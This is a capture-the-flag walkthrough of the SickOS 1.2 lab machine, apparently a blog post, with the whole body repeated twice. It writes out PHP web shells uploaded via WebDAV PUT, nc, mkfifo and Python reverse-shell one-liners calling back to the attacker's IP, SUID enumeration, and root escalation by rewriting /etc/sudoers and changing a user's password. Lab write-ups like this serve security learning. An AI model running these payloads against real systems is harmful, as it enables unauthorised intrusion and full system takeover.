SickOS 1.2 -- Walkthrough
Nmap scan report for 192.168.0.105
Host is up (0.0089s latency).
MAC Address: AA:AA:AA:AA:AA:AA (Unknown)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
From the website we have an image and nothing else.
No info in source code
No info from Dirb
Nothing from Nikto
Hmm so lets take a look at the image more closely...
-- identify -verbose 1.jpg
Nothing interesting in here...
so now lets look at the directory listing under 'Test'
We can use Curl to tell us http Methods that we may not of found directly
from the nmap -A scan.
user@logikz: curl -X OPTIONS http://192.168.0.105/test -v
* Trying 192.168.0.105...
* TCP_NODELAY set
* Connected to 192.168.0.105 (192.168.0.105) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.0.105
> User-Agent: curl/7.52.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.0.105/test/
< Content-Length: 0
< Date: Sun, 19 Nov 2017 18:18:26 GMT
< Server: lighttpd/1.4.28
<
* Curl_http_done: called premature == 0
* Connection #0 to host 192.168.0.105 left intact
We can see the option for 'PUT' is allowed. This means we should be able to place a file on the server.
curl -X PUT http://192.168.0.105/test/python-backdoor-2.py --upload-file python-backdoor-2.py
This failed
Lets try adding our own code directly into a file liek so..
curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' http://192.168.0.105/test/shell.php
Now we can execute system command using the "cmd" prefix
Also we can just execute one command
curl -v -X PUT -d '<?php echo shell_exec("whoami"); ?>' http://192.168.0.105/test/shell3.php
curl -v -X PUT -d '<?php echo shell_exec("cat /etc/passwd"); ?>' http://192.168.0.105/test/shell3.php
This gives us the following...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
So we have a user account called "john"
So now lets see if we can create a reverse shell.
curl -v -X PUT -d '<?php echo shell_exec("/bin/nc 192.168.0.100 8484"); ?>' http://192.168.0.105/test/nc.php
dint work ...
try this
curl -v -X PUT -d '<?php echo `whoami`; ?>' http://192.168.0.105/test/whoami.php
We can also run commands ourselves like so. using the 'cmd' parameter
curl -v -X PUT -d '<?php passthru($_GET['cmd']); ?>' http://192.168.0.105/test/cmd.php
http://192.168.0.105/test/cmd.php?cmd=mkfifo /tmp/mkbkikk; /bin/nc 192.168.0.100 8989 0%3C/tmp/mkbkikk | /bin/sh %3E/tmp/mkbkikk 2%3E&1; rm /tmp/mkbkikk
nope doesnt work...
next i try to see what ports are open locally on the machine.
Usually i can do this by pipiing the output with 'tee' to a file then reading the file..
http://192.168.0.105/test/cmd.php?cmd=/bin/nc%20-z%20-v%20192.168.0.105%201-100%20|&%20/usr/bin/tee%20test.txt
this works on my pc but not on the box :-(
ARRR!!!
eventually the answer was found was -
http://192.168.0.105/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
Whilst waiting for a connection with;
sudo nc -l -p 443 -v
$
Next we move the python backdoor onto the server like so.. We can use nc through the exsiting nc on a different port 8889
awer@logikz:/opt/enumeration sudo nc -v -w 40 -p 443 -l < python-backdoor-2.py 1 ↵
[sudo] password for awer:
listening on [any] 443 ...
192.168.0.105: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.105] 41808
$ nc -v -w 10 192.168.0.100 443 > python-backdoor-2.py
Connection to 192.168.0.100 443 port [tcp/https] succeeded!
we can upload the pentest monkey backdoor and get a shell but this doesnt gives us a TTY shell so is of no use..
we look at the SUID bits - find / -perm -u=s -type f -ls 2>/dev/null
$ find / -perm -u=s -type f -ls 2>/dev/null
find / -perm -u=s -type f -ls 2>/dev/null
667707 268 -rwsr-xr-- 1 root dip 273272 Feb 4 2011 /usr/sbin/pppd
667843 20 -rwsr-sr-x 1 libuuid libuuid 17976 Mar 29 2012 /usr/sbin/uuidd
786948 8 -rwsr-xr-x 1 root root 5564 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device
1055122 244 -rwsr-xr-x 1 root root 248056 Jan 13 2016 /usr/lib/openssh/ssh-keysign
668412 12 -rwsr-xr-x 1 root root 9728 Feb 16 2016 /usr/lib/pt_chown
668120 12 -r-sr-xr-x 1 root root 9532 Mar 30 2016 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
668337 16 -r-sr-xr-x 1 root root 14320 Mar 30 2016 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
1182917 312 -rwsr-xr-- 1 root messagebus 316824 Jun 13 2013 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
660925 72 -rwsr-xr-x 2 root root 69708 Feb 27 2013 /usr/bin/sudoedit
667308 16 -rwsr-xr-x 1 root root 14012 Nov 8 2011 /usr/bin/traceroute6.iputils
660925 72 -rwsr-xr-x 2 root root 69708 Feb 27 2013 /usr/bin/sudo
659044 32 -rwsr-xr-x 1 root root 31748 Sep 12 2012 /usr/bin/chsh
659043 44 -rwsr-xr-x 1 root root 41284 Sep 12 2012 /usr/bin/passwd
659041 40 -rwsr-xr-x 1 root root 40292 Sep 12 2012 /usr/bin/chfn
667072 44 -rwsr-sr-x 1 daemon daemon 42800 Oct 25 2011 /usr/bin/at
667649 56 -rwsr-xr-x 1 root root 56208 Jul 28 2011 /usr/bin/mtr
659047 60 -rwsr-xr-x 1 root root 57956 Sep 12 2012 /usr/bin/gpasswd
658916 32 -rwsr-xr-x 1 root root 30896 Sep 12 2012 /usr/bin/newgrp
1179695 88 -rwsr-xr-x 1 root root 88760 Mar 29 2012 /bin/mount
1179715 40 -rwsr-xr-x 1 root root 39116 Nov 8 2011 /bin/ping6
1182983 28 -rwsr-xr-x 1 root root 26252 Mar 2 2012 /bin/fusermount
1179696 68 -rwsr-xr-x 1 root root 67720 Mar 29 2012 /bin/umount
1179714 36 -rwsr-xr-x 1 root root 34740 Nov 8 2011 /bin/ping
1179689 32 -rwsr-xr-x 1 root root 31116 Sep 12 2012 /bin/su
Check what services are running
service --status-all
Only ssh service is running.
We try to brute force the user 'john'
lets change into a TTY shell
python -c 'import pty; pty.spawn("/bin/bash")'
#TESTING#
printf "%s\n" '#!/bin/bash' "echo 'john:password' | chpasswd" "echo 'john ALL=(ALL:ALL) ALL' >> /etc/sudoers" "touch /tmp/root.py" "chmod 777 /tmp/root.py" "chown root:root /tmp/root.py" > update
printf "%s\n" '#!/bin/bash' "echo 'john:password' | chpasswd" "chmod 777 /etc/sudoers" "echo 'john ALL=(ALL:ALL) ALL' >> /etc/sudoers" "touch /tmp/test-1.py" "chmod 777 /tmp/test-1.sh" "chown root:root /tmp/test-1.sh" "chmod 440 /etc/sudoers" > update
http://192.168.0.105/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
http://192.168.0.105/test/cmd.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Finally we decide to add the www-data user to the sudoers file.
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
Then a simple 'sudo su'
and we have r00t
Nmap scan report for 192.168.0.105
Host is up (0.0089s latency).
MAC Address: AA:AA:AA:AA:AA:AA (Unknown)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
From the website we have an image and nothing else.
No info in source code
No info from Dirb
Nothing from Nikto
Hmm so lets take a look at the image more closely...
-- identify -verbose 1.jpg
Nothing interesting in here...
so now lets look at the directory listing under 'Test'
We can use Curl to tell us http Methods that we may not of found directly
from the nmap -A scan.
user@logikz: curl -X OPTIONS http://192.168.0.105/test -v
* Trying 192.168.0.105...
* TCP_NODELAY set
* Connected to 192.168.0.105 (192.168.0.105) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.0.105
> User-Agent: curl/7.52.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.0.105/test/
< Content-Length: 0
< Date: Sun, 19 Nov 2017 18:18:26 GMT
< Server: lighttpd/1.4.28
<
* Curl_http_done: called premature == 0
* Connection #0 to host 192.168.0.105 left intact
We can see the option for 'PUT' is allowed. This means we should be able to place a file on the server.
curl -X PUT http://192.168.0.105/test/python-backdoor-2.py --upload-file python-backdoor-2.py
This failed
Lets try adding our own code directly into a file liek so..
curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' http://192.168.0.105/test/shell.php
Now we can execute system command using the "cmd" prefix
Also we can just execute one command
curl -v -X PUT -d '<?php echo shell_exec("whoami"); ?>' http://192.168.0.105/test/shell3.php
curl -v -X PUT -d '<?php echo shell_exec("cat /etc/passwd"); ?>' http://192.168.0.105/test/shell3.php
This gives us the following...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
So we have a user account called "john"
So now lets see if we can create a reverse shell.
curl -v -X PUT -d '<?php echo shell_exec("/bin/nc 192.168.0.100 8484"); ?>' http://192.168.0.105/test/nc.php
dint work ...
try this
curl -v -X PUT -d '<?php echo `whoami`; ?>' http://192.168.0.105/test/whoami.php
We can also run commands ourselves like so. using the 'cmd' parameter
curl -v -X PUT -d '<?php passthru($_GET['cmd']); ?>' http://192.168.0.105/test/cmd.php
http://192.168.0.105/test/cmd.php?cmd=mkfifo /tmp/mkbkikk; /bin/nc 192.168.0.100 8989 0%3C/tmp/mkbkikk | /bin/sh %3E/tmp/mkbkikk 2%3E&1; rm /tmp/mkbkikk
nope doesnt work...
next i try to see what ports are open locally on the machine.
Usually i can do this by pipiing the output with 'tee' to a file then reading the file..
http://192.168.0.105/test/cmd.php?cmd=/bin/nc%20-z%20-v%20192.168.0.105%201-100%20|&%20/usr/bin/tee%20test.txt
this works on my pc but not on the box :-(
ARRR!!!
eventually the answer was found was -
http://192.168.0.105/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
Whilst waiting for a connection with;
sudo nc -l -p 443 -v
$
Next we move the python backdoor onto the server like so.. We can use nc through the exsiting nc on a different port 8889
awer@logikz:/opt/enumeration sudo nc -v -w 40 -p 443 -l < python-backdoor-2.py 1 ↵
[sudo] password for awer:
listening on [any] 443 ...
192.168.0.105: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.105] 41808
$ nc -v -w 10 192.168.0.100 443 > python-backdoor-2.py
Connection to 192.168.0.100 443 port [tcp/https] succeeded!
we can upload the pentest monkey backdoor and get a shell but this doesnt gives us a TTY shell so is of no use..
we look at the SUID bits - find / -perm -u=s -type f -ls 2>/dev/null
$ find / -perm -u=s -type f -ls 2>/dev/null
find / -perm -u=s -type f -ls 2>/dev/null
667707 268 -rwsr-xr-- 1 root dip 273272 Feb 4 2011 /usr/sbin/pppd
667843 20 -rwsr-sr-x 1 libuuid libuuid 17976 Mar 29 2012 /usr/sbin/uuidd
786948 8 -rwsr-xr-x 1 root root 5564 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device
1055122 244 -rwsr-xr-x 1 root root 248056 Jan 13 2016 /usr/lib/openssh/ssh-keysign
668412 12 -rwsr-xr-x 1 root root 9728 Feb 16 2016 /usr/lib/pt_chown
668120 12 -r-sr-xr-x 1 root root 9532 Mar 30 2016 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
668337 16 -r-sr-xr-x 1 root root 14320 Mar 30 2016 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
1182917 312 -rwsr-xr-- 1 root messagebus 316824 Jun 13 2013 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
660925 72 -rwsr-xr-x 2 root root 69708 Feb 27 2013 /usr/bin/sudoedit
667308 16 -rwsr-xr-x 1 root root 14012 Nov 8 2011 /usr/bin/traceroute6.iputils
660925 72 -rwsr-xr-x 2 root root 69708 Feb 27 2013 /usr/bin/sudo
659044 32 -rwsr-xr-x 1 root root 31748 Sep 12 2012 /usr/bin/chsh
659043 44 -rwsr-xr-x 1 root root 41284 Sep 12 2012 /usr/bin/passwd
659041 40 -rwsr-xr-x 1 root root 40292 Sep 12 2012 /usr/bin/chfn
667072 44 -rwsr-sr-x 1 daemon daemon 42800 Oct 25 2011 /usr/bin/at
667649 56 -rwsr-xr-x 1 root root 56208 Jul 28 2011 /usr/bin/mtr
659047 60 -rwsr-xr-x 1 root root 57956 Sep 12 2012 /usr/bin/gpasswd
658916 32 -rwsr-xr-x 1 root root 30896 Sep 12 2012 /usr/bin/newgrp
1179695 88 -rwsr-xr-x 1 root root 88760 Mar 29 2012 /bin/mount
1179715 40 -rwsr-xr-x 1 root root 39116 Nov 8 2011 /bin/ping6
1182983 28 -rwsr-xr-x 1 root root 26252 Mar 2 2012 /bin/fusermount
1179696 68 -rwsr-xr-x 1 root root 67720 Mar 29 2012 /bin/umount
1179714 36 -rwsr-xr-x 1 root root 34740 Nov 8 2011 /bin/ping
1179689 32 -rwsr-xr-x 1 root root 31116 Sep 12 2012 /bin/su
Check what services are running
service --status-all
Only ssh service is running.
We try to brute force the user 'john'
lets change into a TTY shell
python -c 'import pty; pty.spawn("/bin/bash")'
#TESTING#
printf "%s\n" '#!/bin/bash' "echo 'john:password' | chpasswd" "echo 'john ALL=(ALL:ALL) ALL' >> /etc/sudoers" "touch /tmp/root.py" "chmod 777 /tmp/root.py" "chown root:root /tmp/root.py" > update
printf "%s\n" '#!/bin/bash' "echo 'john:password' | chpasswd" "chmod 777 /etc/sudoers" "echo 'john ALL=(ALL:ALL) ALL' >> /etc/sudoers" "touch /tmp/test-1.py" "chmod 777 /tmp/test-1.sh" "chown root:root /tmp/test-1.sh" "chmod 440 /etc/sudoers" > update
http://192.168.0.105/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
http://192.168.0.105/test/cmd.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Finally we decide to add the www-data user to the sudoers file.
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
Then a simple 'sudo su'
and we have r00t
No comments:
Post a Comment